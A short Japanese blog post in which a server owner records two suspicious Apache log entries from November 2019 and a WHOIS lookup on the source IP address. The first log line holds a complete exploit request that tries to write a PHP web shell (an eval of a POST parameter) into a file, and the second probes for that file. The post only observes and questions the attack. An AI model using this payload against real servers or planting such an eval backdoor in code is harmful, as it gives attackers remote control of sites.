Webサーバー:怪しいhttpd log 2019/11/16

Apache Webサーバーに、またまた変なログが記録されていることに気付きましたので、そのメモ。

122.51.78.36 - - [16/Nov/2019:22:07:50 +0900] "GET /?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('hmseo.php','<?php%20@eval($_POST[hm]);?>hmseo')</php> HTTP/1.1" 200 2472 "https://www.lifewithunix.jp/?a=fetch&templateFile=public/index&prefix=''&content=php>file_put_contents('hmseo.php','<?php @eval($_POST[hm]);?>hmseo')</php>" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
122.51.78.36 - - [16/Nov/2019:22:07:55 +0900] "GET /hmseo.php HTTP/1.1" 404 1182 "https://www.lifewithunix.jp/hmseo.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"

IPアドレスがどこのものかと調べてみると、予想通り中国。

% Information related to '122.51.0.0 - 122.51.127.255'

% Abuse contact for '122.51.0.0 - 122.51.127.255' is 'ip@cnispgroup.com'

inetnum:        122.51.0.0 - 122.51.127.255
netname:        hitiit
descr:          Guangzhou Haizhiguang communication technology Limited
descr:          Room601,Information Hub Building,No.1 Zhong Six Road
descr:          Higher Education Mega Center,Panyu District,Guangzhou
country:        CN
admin-c:        KJ422-AP
tech-c:         LZ2742-AP
status:         allocated non-portable
mnt-by:         MAINT-AP-CNISP
mnt-irt:        IRT-CNISP-CN
last-modified:  2014-06-17T03:02:14Z
source:         APNIC

phpのセキュリティーホールを狙ったもの?
一体、何がしたいのか。

コメントを残す